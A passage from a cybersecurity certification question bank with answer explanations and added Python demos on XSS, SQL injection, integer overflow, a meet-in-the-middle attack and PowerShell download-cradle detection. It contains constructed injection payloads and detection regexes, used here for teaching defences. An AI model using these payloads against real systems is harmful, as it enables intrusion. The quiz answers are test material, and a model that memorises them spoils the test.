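    "encoded-command": r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}",
    "bypass-policy": r"-(?:ep|executionpolicy)\s+bypass\b",
}
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent or not valid base64/UTF-16LE."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event):
    """Score one event: a cradle pattern plus at least one stealth flag marks a download cradle."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    searchable = cmd + " " + decoded          # match against both raw and decoded text
    reasons = [name for name, pat in STEALTH_FLAGS.items() if re.search(pat, cmd, re.I)]
    cradle = [p for p in CRADLE_PATTERNS if re.search(p, searchable, re.I)]
    if cradle:
        reasons.append("download-cradle:" + ",".join(cradle))
    return {"pid": event["pid"], "is_cradle": bool(cradle) and len(reasons) > 1,
            "reasons": reasons, "decoded": decoded}


def flag_events(events):
    return [r for r in (analyze(e) for e in events) if r["is_cradle"]]


if __name__ == "__main__":
    for r in flag_events(SAMPLE_EVENTS):
        print(r["pid"], r["reasons"], r["decoded"][:60])
```

The legitimate -NoProfile -ExecutionPolicy Bypass -File invocation is deliberately left unflagged: stealth flags alone are common in administration scripts, and it is the combination with a fetch-and-evaluate primitive that distinguishes a cradle.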

You are conducting a static analysis of an application's source code and see the following: (String) page += "<type name='id' type='INT' value='" + request.getParameter("ID") + "'>"; Based on this code snippet, which of the following security flaws exists in this application? A. Race condition B. Improper input validation C. Improper error handling D. Insufficient logging and monitoring

B. Improper input validation Based on this code snippet, the application does not validate the ID parameter and writes it straight into an HTML attribute without encoding it. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could supply the following as the value of "ID": MALICIOUS SCRIPT GOES HERE. This could cause the victim's ID to be sent to "malicious-website.com", where additional code could be run, or the session could then be hijacked. Based on the code snippet provided, we have no indication of the level of logging and monitoring being performed, nor of whether proper error handling is being conducted. A race condition is a software vulnerability in which the outcome of execution depends directly on the order and timing of certain events, and those events fail to execute in the order and timing the developer intended.

Which of the following tools is a command-line vulnerability scanner that scans web servers for dangerous files/CGIs? A. John the Ripper B. Nikto C. Kon-Boot D. Snort

B. Nikto Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server-type-specific checks. It also captures and prints any cookies received. The Nikto code itself is free software, but the data files it uses to drive the program are not. Incorrect answers: Snort https://www.snort.org/ Snort is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) created in 1998 by Martin Roesch, founder and former CTO of Sourcefire. Snort is now developed by Cisco, which purchased Sourcefire in 2013. John the Ripper https://www.openwall.com/john/ John the Ripper is an open source password security auditing and password recovery tool available for many operating systems. Kon-Boot https://en.wikipedia.org/wiki/Kon-Boot Kon-Boot is a software utility that allows users to bypass Microsoft Windows passwords and Apple macOS passwords (Linux support has been deprecated) without lasting or persistent changes to the system on which it is executed. It is also the first reported tool capable of bypassing Windows 10 online (live) passwords and supporting both Windows and macOS systems.

Which of the following secure coding best practices ensures a character like < is translated into the &lt string when writing to an HTML page? A. Session management B. Output encoding C. Error handling D. Input validation

B. Output encoding keyword is translated not rejected** Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.
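
The two answers above (the unvalidated ID parameter in the static-analysis question and output encoding here) are the same control seen from two sides. As an added example, not code from the quiz or from any project, the Python below rebuilds the reviewed markup pattern with a constructed attacker value, parses both the raw and the encoded output the way a browser would tokenize it, and shows that encoding turns the payload into inert attribute text while validation would reject it outright. The tag name and attribute names mirror the snippet on this page; the payload is constructed.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Collects (tag, attributes) pairs as a browser-like tokenizer would see them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


# Constructed attacker input for the ID parameter: closes the quoted attribute and the tag,
# injects a script element, then reopens a dummy attribute so the rest still parses.
PAYLOAD = "1'><script>alert(1)</script><x a='"


def build_field_unsafe(user_id):
    """The reviewed pattern: request parameter concatenated straight into HTML."""
    return "<type name='id' type='INT' value='" + user_id + "'>"


def build_field_encoded(user_id):
    """Output encoding: <, >, &, ' and " are translated into entities, never rejected."""
    return "<type name='id' type='INT' value='" + html.escape(user_id, quote=True) + "'>"


def validate_id(user_id):
    """Input validation, the complementary control: an INT field should only ever hold digits."""
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("ID must be a non-negative integer")
    return int(user_id)


def tag_names(markup):
    return [tag for tag, _ in parse_tags(markup)]


if __name__ == "__main__":
    print("unsafe  :", build_field_unsafe(PAYLOAD), "->", tag_names(build_field_unsafe(PAYLOAD)))
    print("encoded :", build_field_encoded(PAYLOAD), "->", tag_names(build_field_encoded(PAYLOAD)))
```

The unsafe version yields three elements (type, script, x), so the browser would execute the script; the encoded version yields a single type element whose value attribute, once the browser decodes the entities, is exactly the attacker's string, now harmless data. Encoding must match the output context (HTML attribute here); a JavaScript or URL context needs its own encoder.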

The management at Steven's work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network? A. A discovery scan using a port scanner B. Router and switch-based MAC address reporting C. A physical survey D. Reviewing a central administration tool like a SCCM

B. Router and switch-based MAC address reporting The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

Which of the following hashing algorithms results in a 160-bit fixed output? A. MD-5 B. SHA-1 C. NTLM D. SHA-2

B. SHA-1 SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? A. SMS should be encrypted to be secure B. SMS messages may be accessible to attackers via VoIP or other systems C. SMS should be paired with a third factor D. SMS is a costly method of providing a second factor of authentication

B. SMS messages may be accessible to attackers via VoIP or other systems NIST SP 800-63B (part of the SP 800-63-3 suite) classifies SMS and other PSTN-based out-of-band authenticators as "restricted" because the message can be intercepted or redirected, for example through SIM swapping, SS7 weaknesses, or VoIP numbers that an attacker can register; a 2016 draft went further and proposed deprecating SMS outright. SMS itself carries no end-to-end encryption (at least without adding additional applications to phones), so option A is not something Sally's organization can simply turn on. A third factor is typically not a user-friendly recommendation; replacing SMS with a stronger second factor would be better. SMS is not a costly method, since it can be deployed for less than $20/month at scale.

Viktor, a professional hacker, targeted an organization's network to sniff all the traffic. During this process, Viktor plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network. What is the attack performed by Viktor in the above scenario? A. VLAN hopping attack B. STP attack C. DNS poisoning attack D. ARP spoofing attack

B. STP Attack Keyword is root bridge. STP achieves a loop-free topology by electing one switch as the root bridge. If the root bridge goes down, the STP topology must find a new root bridge and the election starts at that moment. A port does not immediately transition from the blocking state to the forwarding state; rather, it transitions from blocking to listening, then to learning, and only then to forwarding. The time before a port starts to forward frames can be up to one minute. An STP manipulation attack is when an attacker, or any unauthorized user, spoofs the root bridge in the topology. The attacker broadcasts an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU announces that the attacker's system has a lower bridge priority, so the other switches elect it as root and forward frames through it, where the attacker can capture them. To prevent this attack you need to secure edge ports (or other untrusted ports) with options such as:
· root-guard - prevents a port from becoming a root port
· bpdu-guard - disables a port on BPDU reception
· bpdu-filter - ignores BPDUs received on a given port (disabling loop detection by STP on that port!)
· tcn-guard - ignores topology change notifications received on a given port

Which of the following tools would you use to audit a multi-cloud environment? A. OpenVAS B. ScoutSuite C. Prowler D. Pacu

B. ScoutSuite ScoutSuite is used to audit instances and policies created on multi-cloud platforms. Prowler is a cloud auditing tool, but it can only be used on AWS. Pacu is an exploitation framework that is used to test the security configurations of an AWS account. OpenVAS is a general-purpose vulnerability scanner but does not deal with cloud-specific issues.

You are scanning a target as part of a penetration test. You discovered that the network uses Snort configured as a network-based IDS. Which of the following occurs when an alert rule has been matched in Snort during your scan? A. The packet matching the rule will be dropped and the IDS will continue scanning new packets B. The entire packet will be evaluated until all of the IDS alert rules have been checked and the packet is allowed to continue its journey C. The IDS will send an alert, stop checking the rest of the rules, and allow the packet to continue its journey D. The source IP address will be blocked and its connection with the network terminated

B. The entire packet will be evaluated until all of the IDS alert rules have been checked and the packet is allowed to continue its journey If Snort is operating as an IDS, it will not block the connection or drop the packet. Instead, Snort will evaluate the entire packet and check all the alert rules, logging any matches it finds, and then allow it to continue onward to its destination.

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/? param=<data:text/html;base64, MALICIOUS CODE GOES HERE ==. What type of exploit are you attempting? A.SQL injection B. XSS C. XML injection D. Password spraying

B. XSS This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack: a data: URI carrying base64-encoded HTML. While you could not decode it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection (no single quote or one-equals-one) nor an XML injection, based on your studies. It is also not an attempt to conduct password spraying, which logs into many different usernames with the same password. So, by process of elimination, you can determine that this is an XSS attack.

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/?param=< data:text /html;base64 THIS SHOULD BE JUNK TEXT HERE ==. What type of attack was attempted? A. SQL injection B. XSS C. XML injection D. Password spraying

B. XSS This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack, and you can see the base64-encoded string being used inside a data: URI. While you could not decode it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection, based on your studies. It is also not an attempt to conduct password spraying, which logs into many different usernames with the same password. So, by process of elimination, you can determine that this is an XSS attack.

While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + request.getParameter("id") + "'"; What is the largest security issue with this line of code? A. The code is using parameterized queries B. The * operator will allow retrieval of every data field about this customer in the CUSTOMER table C. An SQL injection could occur because input validation is not being used on the id parameter D. This code is vulnerable to a buffer overflow attack

C. An SQL injection could occur because input validation is not being used on the id parameter This code takes the input of "id" directly from a user or other program without conducting any input validation and splices it into the SQL text. This could be exploited as an attack vector for an SQL injection. If a malicious user can control the id value, it might get replaced with something like ' OR '1'='1, which turns the statement into: SELECT * FROM CUSTOMER WHERE CUST_ID='' OR '1'='1'. Because '1' always equals '1', the WHERE clause always evaluates to true, meaning that EVERY record in the table could now be returned to the attacker. When creating SQL statements there are reasons for and against the use of the * operator; its presence alone does not indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow, since you do not see how the id value is declared or stored. This code is not using parameterized queries; if it did, the vulnerability would be eliminated, because a parameterized query (prepared statement) keeps the query structure fixed and passes the value separately as data rather than as SQL text.
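
To see the difference in behaviour rather than in theory, here is an added Python example (not from the quiz or from any project) that reproduces the reviewed concatenation against a constructed in-memory SQLite CUSTOMER table and runs the same tautology payload through both the concatenated query and a parameterized one. The table contents and the injection string are constructed; sqlite3 is used as a stand-in for whatever database the reviewed program talks to.

```python
import sqlite3


def make_customer_db():
    """Constructed in-memory table standing in for the CUSTOMER table in the reviewed code."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CUSTOMER (CUST_ID TEXT PRIMARY KEY, NAME TEXT)")
    conn.executemany("INSERT INTO CUSTOMER VALUES (?, ?)",
                     [("1001", "Alice"), ("1002", "Bob"), ("1003", "Carol")])
    return conn


def lookup_concatenated(conn, cust_id):
    """Mirrors the reviewed line: the id parameter is spliced into the SQL text."""
    query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, cust_id):
    """Prepared statement: the query text is fixed and the value travels separately as data."""
    return conn.execute("SELECT * FROM CUSTOMER WHERE CUST_ID=?", (cust_id,)).fetchall()


# Constructed payload: closes the string literal, adds a tautology, and reuses the closing quote
# that the code appends, so the statement stays syntactically valid.
INJECTION = "' OR '1'='1"


if __name__ == "__main__":
    db = make_customer_db()
    print("concatenated :", lookup_concatenated(db, INJECTION))   # every row
    print("parameterized:", lookup_parameterized(db, INJECTION))  # no rows
    print("legitimate   :", lookup_parameterized(db, "1002"))
```

With the payload, the concatenated lookup returns all three customers while the parameterized lookup returns nothing, because the database is asked for a customer whose ID is literally the string ' OR '1'='1.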

An insurance company has developed a new web application to allow its customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and uses MSSQL for its backend database. You have located the application's search form and entered the following code in the search input field: IMG SRC= SCRIPT HERE:msgbox("MALICIOUS CODE HERE":msgbox("Vulnerable_to_Attack ");>" When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application? A. Cross-site request forgery B. Command injection C. Cross-site scripting D. SQL injection

C. Cross-site scripting This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user's interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

What is a reverse proxy commonly used for? A. Allowing access to a virtual private cloud B. To prevent the unauthorized use of cloud services from the local network C. Directing traffic to internal services if the contents of the traffic comply with the policy D. To obfuscate the origin of a user within a network

C. Directing traffic to internal services if the contents of the traffic comply with the policy A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users' devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server's response back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. SQL injection B. Impersonation C. Integer overflow attack D. Password spraying

C. Integer overflow attack Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows, because the wrapped value is then used as a length or allocation size. An integer overflow occurs when an arithmetic operation produces a number too large for the space allocated to it. Integers are stored in 32 bits on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, the high bit is lost and the value wraps around, as in this example where 0xffffffff + 1 became 0x00000000. SQL injection is an attack that injects a database query into the input data directed at a server through the application's client side. Password spraying is a type of brute-force attack in which many user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.
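
The following added Python example (not from the quiz) models 32-bit unsigned arithmetic to show the wraparound above and, more importantly, how it turns into a buffer overflow: a length check written as header + payload <= buffer size can be bypassed when the addition wraps, while the rearranged check cannot. The header and buffer sizes are constructed.

```python
U32_MAX = 0xFFFFFFFF


def add_u32_wrapping(a, b):
    """Unsigned 32-bit addition as the hardware does it: the carry out of bit 31 is lost."""
    return (a + b) & U32_MAX


def add_u32_checked(a, b):
    """Same addition with the carry detected; returns None instead of a wrapped value."""
    total = a + b
    return None if total > U32_MAX else total


HEADER_LEN = 16     # constructed fixed header size
BUF_SIZE = 4096     # constructed destination buffer size


def length_check_naive(payload_len):
    """The classic bug: 'if (HEADER_LEN + payload_len <= BUF_SIZE)' evaluated in 32 bits."""
    return add_u32_wrapping(HEADER_LEN, payload_len) <= BUF_SIZE


def length_check_safe(payload_len):
    """Rearranged so no intermediate result can wrap: compare against the remaining space."""
    return payload_len <= BUF_SIZE - HEADER_LEN


def copy_would_overflow(payload_len, check):
    """True if the given check admits a payload that then overruns the buffer when copied."""
    return check(payload_len) and HEADER_LEN + payload_len > BUF_SIZE


if __name__ == "__main__":
    print(hex(add_u32_wrapping(0xFFFFFFFF, 1)))       # the page's 0xffffffff + 1 -> 0x0
    evil = 0xFFFFFFF8                                # 16 + evil wraps to 8, which passes the naive check
    print("naive check passes:", length_check_naive(evil),
          "| safe check passes:", length_check_safe(evil))
```

A payload length of 0xFFFFFFF8 makes the naive check compute 8 and accept it; the subsequent copy of that many bytes would run far past the 4096-byte buffer. The safe form subtracts a constant from a constant, so there is nothing left to overflow.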

You are conducting a wireless penetration test against an organization. During your reconnaissance, you discover that their network is known as "BigCorpWireless" has its SSID broadcast is enabled. You configure your laptop to respond to requests for connection to "BigCorpWireless" and park at the far end of the parking lot. At the end of the workday, as people get in their cars in the parking lot, you see numerous smartphones connecting to your laptop over WiFi. Which of the following exploits did you utilize? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

C. Karma attack A karma attack is a variant of the evil twin attack. It exploits the behavior of a wireless client trying to reconnect to entries in its preferred network list, which contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect, it first sends probe requests to discover whether any of those previously joined networks are within range. A karma attacker answers those probe requests, allowing the device to connect to the attacker's access point instead, as an evil twin. At this point, the attacker is the man-in-the-middle between the wireless client and the internet, which is useful for many different exploits.

Determine the attack by the description: The known-plaintext attack used against DES. This attack causes that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key. A. Replay attack B. Traffic analysis attack C. Meet-in-the-middle attack D. Man-in-the-middle attack

C. Meet-in-the-middle attack The meet-in-the-middle attack, a known-plaintext attack, is a generic space-time tradeoff cryptographic attack against encryption schemes that perform multiple encryption operations in sequence (the abbreviation MITM is also used for man-in-the-middle, an unrelated network attack). It is the primary reason Double DES is not used, and why a Triple DES key (168 bits) can be brute-forced by an attacker with 2^56 space and 2^112 operations, leaving 3DES with only 112 bits of effective security. The intruder has to know some plaintexts and their corresponding ciphertexts. Using meet-in-the-middle attacks it is possible to break ciphers that apply two or more secret keys in multiple encryption with the same algorithm; 3DES works in this way. The meet-in-the-middle attack was first presented by Diffie and Hellman in their cryptanalysis of DES.
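
To make the space-time tradeoff tangible, here is an added Python example (not from the quiz) that runs a meet-in-the-middle attack against a constructed toy cipher doubled the way Double DES doubles DES. The toy cipher has a 16-bit block and an 8-bit key, so two keys give a 2^16 keyspace; the attack recovers both keys with about 2 * 2^8 cipher calls and a 2^8-entry table. The cipher itself is an assumption made for illustration and has no security value.

```python
# Toy 16-bit block cipher with an 8-bit key, constructed only to make the
# meet-in-the-middle work factor visible. It is not DES and is not secure.
MASK16 = 0xFFFF


def _rotl16(x, n):
    n %= 16
    return ((x << n) | (x >> (16 - n))) & MASK16


def _rotr16(x, n):
    n %= 16
    return ((x >> n) | (x << (16 - n))) & MASK16


def toy_encrypt(key, block):
    block ^= (key * 0x0101) & MASK16        # key mixing
    block = _rotl16(block, key & 0xF)       # key-dependent rotation
    return (block + 0x1234 + key) & MASK16  # modular add


def toy_decrypt(key, block):
    block = (block - 0x1234 - key) & MASK16
    block = _rotr16(block, key & 0xF)
    return block ^ ((key * 0x0101) & MASK16)


def double_encrypt(k1, k2, block):
    """The analogue of Double DES: C = E_k2(E_k1(P))."""
    return toy_encrypt(k2, toy_encrypt(k1, block))


def meet_in_the_middle(pairs):
    """Recover (k1, k2) from known plaintext/ciphertext pairs.

    Phase 1 encrypts P under every k1 and stores the middle values (2^8 encryptions,
    2^8 table entries). Phase 2 decrypts C under every k2 and looks the result up
    (2^8 decryptions). Each match is a candidate pair; further pairs weed out false
    matches. Total work is about 2 * 2^8 instead of 2^16 for brute force.
    """
    p0, c0 = pairs[0]
    middle = {}
    for k1 in range(256):
        middle.setdefault(toy_encrypt(k1, p0), []).append(k1)
    candidates = []
    for k2 in range(256):
        for k1 in middle.get(toy_decrypt(k2, c0), []):
            if all(double_encrypt(k1, k2, p) == c for p, c in pairs[1:]):
                candidates.append((k1, k2))
    work = 2 * 256   # cipher calls in the two phases (candidate verification excluded)
    return candidates, work


def known_pairs(k1, k2, plaintexts):
    """Constructed known-plaintext material for the secret key pair."""
    return [(p, double_encrypt(k1, k2, p)) for p in plaintexts]


if __name__ == "__main__":
    pairs = known_pairs(0x3A, 0xC7, [0x0000, 0xBEEF, 0x1234])
    found, work = meet_in_the_middle(pairs)
    print(f"candidates={[(hex(a), hex(b)) for a, b in found]} work={work} vs brute force {256 * 256}")
```

Scaling the same idea to DES (56-bit keys, 64-bit blocks) gives the 2^57 time and 2^56 memory figures for Double DES and the 2^112 / 2^56 figures for 3DES quoted above; the middle table is what trades memory for time.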

What must be developed to show security improvements over time? A. Reports B. Testing tools C. Metrics D. Taxonomy of vulnerabilities

C. Metrics Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.

A technician just completed the second phase of their scans using Firewalk and the following output was displayed on their terminal: TCP port 21 - no response TCP port 22 - no response TCP port 23 - Time-to-live exceeded Based on these scan results, which of the following statements are true? A. Firewall is blocking ports 21 through 23 and a service on the target is listening on port 23 B. No response from port 21 and 22 indicates services are not running on the target C. Port 23 was not blocked at the firewall because the scan on port 23 passed through the filtering device D. A TTL response error indicates port 23 was able to make a connection to the target

C. Port 23 was not blocked at the firewall because the scan on port 23 passed through the filtering device Keyword in the question is time-to-live exceeded. Firewalk sends TCP or UDP packets with a TTL one greater than the hop count to the targeted gateway. If the gateway allows the traffic, it forwards the packets to the next hop, where the TTL expires and elicits an ICMP TIME_EXCEEDED message back to the scanner. If the gateway does not allow the traffic, it drops the packets and no response is sent. Therefore, a TTL exceeded message for port 23 shows that the filtering device passes that port, while silence on ports 21 and 22 indicates that they are being filtered. Note that Firewalk says nothing about whether a service is actually listening on the target host, since the probe dies one hop past the gateway; that is why options A, B and D are wrong.

Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue? A. Add another vulnerability scanner B. Reduce the scope of scans C. Reduce the sensitivity of scans D. Reduce the frequency of scans

C. Reduce the sensitivity of scans **KEYWORD IS LEAST LIKELY If the cybersecurity analyst were to reduce the scans' sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans' scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans' frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.

Dion Training has publicly hosted web applications and an internal Intranet server that is protected by a firewall. Which of the following techniques would help them protect themselves against enumeration? A. Reject all invalid emails received over SMTP B. Allow full DNS zone transfer C. Remove A records for any internal hosts D. Enable null session pipes on their intranet

C. Remove A records for any internal hosts. Keyword is internal. Any internal server names and IPs should have their A records removed from the external DNS server because only internal users need to access the internal records. Dion Training's internal servers should only have A records on their internal DNS server. Those A records should not be forwarded outside of the firewall boundary to prevent reconnaissance and enumeration by attackers.

Identify Secure Hashing Algorithm, which produces a 160-bit digest from a message on principles similar to those used in MD4 and MD5? A. SHA-3 B. SHA-2 C. SHA-1 D. SHA-0

C. SHA-1 SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function that takes an input and produces a 160-bit (20-byte) hash value known as a message digest, typically rendered as a 40-digit hexadecimal number. It was designed by the United States National Security Agency and is a U.S. Federal Information Processing Standard. SHA-1 produces a message digest based on principles similar to those used by Ronald L. Rivest of MIT in the design of the MD2, MD4 and MD5 message digest algorithms, but generates a larger hash value (160 bits vs. 128 bits). It remains the correct answer for the digest size, but SHA-1 is no longer collision resistant (a practical collision was published in 2017) and must not be used for digital signatures or certificates. Incorrect answers: SHA-0 https://en.wikipedia.org/wiki/SHA-1#SHA-0 The original specification was published in 1993 as the Secure Hash Standard (FIPS PUB 180); that version is now called SHA-0. The NSA withdrew it soon afterwards and corrected the message schedule by adding a one-bit left rotation that SHA-0 lacked, a change intended to improve security. The revised algorithm was standardized on April 17, 1995 as FIPS PUB 180-1 and is known as SHA-1. SHA-2 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. They are built using the Merkle-Damgård construction, from a one-way compression function itself built using the Davies-Meyer structure from a specialized block cipher. SHA-2 includes significant changes from its predecessor, SHA-1. The SHA-2 family consists of six hash functions with digests (hash values) of 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256. SHA-256 and SHA-512 are novel hash functions computed with 32-bit and 64-bit words, respectively. They use different shift amounts and additive constants, but their structures are otherwise virtually identical, differing only in the number of rounds.
SHA-224 and SHA-384 are truncated versions of SHA-256 and SHA-512 respectively, computed with different initial values. SHA-512/224 and SHA-512/256 are also truncated versions of SHA-512, but their initial values are generated using the method described in Federal Information Processing Standards (FIPS) PUB 180-4. SHA-2 was first published by the National Institute of Standards and Technology (NIST) as a U.S. federal standard (FIPS). The SHA-2 family of algorithms is covered by US patent 6829355, which the United States has released under a royalty-free license. SHA-3 https://en.wikipedia.org/wiki/SHA-3 SHA-3 (Secure Hash Algorithm 3) is the latest member of the Secure Hash Algorithm family of standards, released by NIST on August 5, 2015. Although part of the same series of standards, SHA-3 is internally different from the MD5-like structure of SHA-1 and SHA-2. SHA-3 is a subset of the broader cryptographic primitive family Keccak (/ˈkɛtʃæk/ or /ˈkɛtʃɑːk/), designed by Guido Bertoni, Joan Daemen, Michaël Peeters, and Gilles Van Assche, building upon RadioGatún. Keccak's authors have proposed additional uses for the function, not (yet) standardized by NIST, including a stream cipher, an authenticated encryption system, a "tree" hashing scheme for faster hashing on certain architectures, and the AEAD ciphers Keyak and Ketje. Keccak is based on a novel approach called the sponge construction. A sponge is built on a wide random function or random permutation and allows inputting ("absorbing" in sponge terminology) any amount of data and outputting ("squeezing") any amount of data, while acting as a pseudorandom function with regard to all previous inputs. This leads to great flexibility.
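As an added illustration (not part of the original study set), the following Python uses only the standard library's hashlib to measure the digest sizes the question contrasts and to check the truncation claim above: because SHA-224 and SHA-384 use their own initial values, simply cutting a SHA-256 or SHA-512 digest short does not produce them. The sample message is constructed for the demo.

```python
import hashlib

# Constructed sample input; digest sizes do not depend on the message.
MESSAGE = b"The quick brown fox jumps over the lazy dog"

FAMILY = ("md5", "sha1", "sha224", "sha256", "sha384", "sha512", "sha3_256")


def digest_bits(algorithm, data=MESSAGE):
    """Output size in bits, measured from an actual digest rather than looked up."""
    return len(hashlib.new(algorithm, data).digest()) * 8


def hex_length(algorithm, data=MESSAGE):
    """Length of the digest rendered as hexadecimal: two characters per byte."""
    return len(hashlib.new(algorithm, data).hexdigest())


def is_plain_truncation(short_alg, long_alg, data=MESSAGE):
    """Does short_alg's digest equal a prefix of long_alg's digest?

    SHA-224 is SHA-256 cut to 28 bytes but computed with different initial
    values, so truncating a SHA-256 digest yourself does NOT give SHA-224
    (likewise SHA-384 vs SHA-512). Expect False for both pairs.
    """
    short = hashlib.new(short_alg, data).digest()
    long_ = hashlib.new(long_alg, data).digest()
    return long_[: len(short)] == short


def summarize(data=MESSAGE):
    """{algorithm: bits} for the algorithms the question contrasts."""
    return {alg: digest_bits(alg, data) for alg in FAMILY}


if __name__ == "__main__":
    for alg, bits in summarize().items():
        print(f"{alg:8s} {bits:4d} bits  {hashlib.new(alg, MESSAGE).hexdigest()}")
    print("sha224 is a prefix of sha256:", is_plain_truncation("sha224", "sha256"))
    print("sha384 is a prefix of sha512:", is_plain_truncation("sha384", "sha512"))
```

Running it prints 128 bits for MD5, 160 for SHA-1 (40 hex digits), 256 for SHA-256 and SHA3-256, and False for both truncation checks.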

Philip, a cybersecurity specialist, needs a tool that can function as a network sniffer, record network activity, prevent and detect network intrusion. Which of the following tools is suitable for Philip? A. Nmap B. Cain & Abel C. Snort D. Nessus

